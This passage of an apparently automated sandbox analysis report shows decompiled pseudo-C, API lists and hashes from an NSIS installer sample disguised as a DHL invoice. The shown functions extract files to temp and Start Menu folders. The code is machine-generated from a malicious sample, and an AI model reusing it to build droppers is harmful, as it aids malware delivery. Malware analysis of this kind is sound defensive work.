					lstrcatW(E00405B59(E00406284(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical\\Mystificerede5\\Montia\\Sbeskummet\\Gtevielsers22")), ??);
				} else {
					E00406284();
				}
				E00406518(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004065C7(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D55(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D7A(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052EC(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E00406284("C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp", _t81);
						E00406284(_t81, _t84);
						E004062A6(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406284(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp");
						_t64 = E004058EA("C:\Users\Arthur\AppData\Local\Temp\nsd3A3C.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052EC();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052EC(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E00403116(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004062A6(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E004062A6(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058EA();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040288b
0x0040288b
0x00402ac5
0x00402ac8
0x00402ac8
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ace
0x00402ace
0x00402ace
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f7
0x004022f7
0x004022f7
0x00401865
0x0040185e
0x00402ad0
0x00402ad4
0x00402ad4
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022f2
0x00000000
0x004022f2
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22,?,?,00000031), ref: 004017D5

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,0040324F), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22, xrefs: 0040179E
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp$C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22$Call
API String ID: 1941528284-904271008
Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004052EC(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x4291e4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004062A6(_t38, 0, 0x4226c8, 0x4226c8, _a4);
					}
					_t27 = lstrlenW(0x4226c8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291c8, 0x4226c8);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226c8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226c8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226c8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052f2
0x004052fc
0x00405301
0x00405307
0x00405312
0x00405315
0x00405318
0x0040531e
0x0040531e
0x00405324
0x0040532c
0x0040532f
0x0040534c
0x00405350
0x00405359
0x00405359
0x00405363
0x0040536c
0x00405378
0x0040537f
0x00405383
0x00405386
0x00405399
0x004053a7
0x004053a7
0x004053ab
0x004053ad
0x004053b0
0x00000000
0x004053b0
0x00405331
0x00405339
0x00405341
0x00405347
0x00000000
0x00405347
0x00405341
0x0040532f
0x004053bc

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,0040324F), ref: 00405347
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll), ref: 00405359
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll, xrefs: 0040530D, 0040531D, 00405323, 00405346, 00405352

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll
API String ID: 2531174081-4188115012
Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065EE(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x00406605
0x0040660e
0x00406610
0x00406610
0x00406614
0x00406627
0x00406621
0x00406621
0x00406621
0x00406640
0x00406654
0x0040665b

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
wsprintfW.USER32 ref: 00406640
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406654

Strings

\, xrefs: 00406616
%s%S.dll, xrefs: 0040663A
UXTHEME, xrefs: 004065F7

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403116(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x410ea0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E00403311( *0x42a278 + _t56);
				}
				if(E004032FB( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E004032FB(0x40cea0, _t91) == 0) {
									goto L33;
								} else {
									if(E00405E2C(_a8, 0x40cea0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E004032FB(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E004067BF(0x40ce10);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E004032FB(0x40cea0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce28 = 0x40cea0;
						 *0x40ce2c = _t92;
						while(1) {
							 *0x40ce30 = _t81;
							 *0x40ce34 = _v12; // executed
							_t69 = E004067DF(0x40ce10); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce30; // 0x410ea0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E004052EC(0,  &_v148); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce30; // 0x410ea0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405E2C(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x00403121
0x00403125
0x00403128
0x0040312d
0x0040312f
0x0040312f
0x00403136
0x0040313a
0x0040313e
0x00403140
0x00403140
0x00403145
0x0040314a
0x00403155
0x00403155
0x00403167
0x004032b2
0x004032b2
0x00000000
0x0040316d
0x00403171
0x0040329d
0x004032e6
0x004032b7
0x004032bd
0x004032bf
0x004032bf
0x004032d0
0x00000000
0x004032d2
0x004032de
0x00403297
0x00403297
0x004032b4
0x004032b4
0x00000000
0x004032b4
0x004032e0
0x004032e3
0x00000000
0x004032e3
0x004032d0
0x004032f1
0x00000000
0x004032f1
0x004032a2
0x004032a4
0x004032a4
0x004032b0
0x004032ee
0x00000000
0x00000000
0x00000000
0x00000000
0x004032b0
0x00403182
0x00403185
0x0040318a
0x0040318a
0x00403194
0x00403197
0x00000000
0x00000000
0x00000000
0x00000000
0x0040319d
0x0040319d
0x0040319d
0x004031a5
0x004031a7
0x004031a7
0x004031b8
0x00000000
0x00000000
0x004031be
0x004031c1
0x004031c7
0x004031cd
0x004031d5
0x004031db
0x004031e0
0x004031e7
0x004031ea
0x00000000
0x00000000
0x004031f0
0x004031f6
0x004031f8
0x00403205
0x00403207
0x00403238
0x0040323e
0x0040324a
0x0040324f
0x0040324f
0x00403254
0x0040328b
0x00000000
0x00000000
0x00000000
0x00403256
0x0040325a
0x0040326f
0x00403272
0x00403275
0x0040327b
0x0040327f
0x00000000
0x00000000
0x00000000
0x00403285
0x00403261
0x00403268
0x00000000
0x00000000
0x0040326a
0x00000000
0x0040326a
0x00403254
0x00403293
0x00000000
0x00403293
0x00000000
0x0040319d

APIs

GetTickCount.KERNEL32 ref: 00403177
GetTickCount.KERNEL32 ref: 004031F8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403225
wsprintfW.USER32 ref: 00403238

Strings

... %d%%, xrefs: 00403232

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004057BB(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004057c6
0x004057ca
0x004057cd
0x004057d3
0x004057d7
0x004057db
0x004057e3
0x004057ea
0x004057f0
0x004057f7
0x004057fe
0x00405806
0x00405808
0x00000000
0x00405808
0x00405812
0x00405819
0x0040582f
0x00000000
0x00000000
0x00000000
0x00405831
0x00405835

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
GetLastError.KERNEL32 ref: 00405812
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
GetLastError.KERNEL32 ref: 00405831

Strings

C:\Users\user\Desktop, xrefs: 004057BB

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405DA9(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405daf
0x00405db5
0x00405db6
0x00405db6
0x00405dbb
0x00405dbc
0x00405dbf
0x00405dc4
0x00405dc7
0x00405dd1
0x00405dde
0x00405de2
0x00405dea
0x00000000
0x00000000
0x00405dee
0x00000000
0x00405df0
0x00405df0
0x00405df0
0x00405df3
0x00405df6
0x00405df6
0x00405df9
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405DC7
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3), ref: 00405DE2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2
"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe", xrefs: 00405DA9
nsa, xrefs: 00405DB6

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
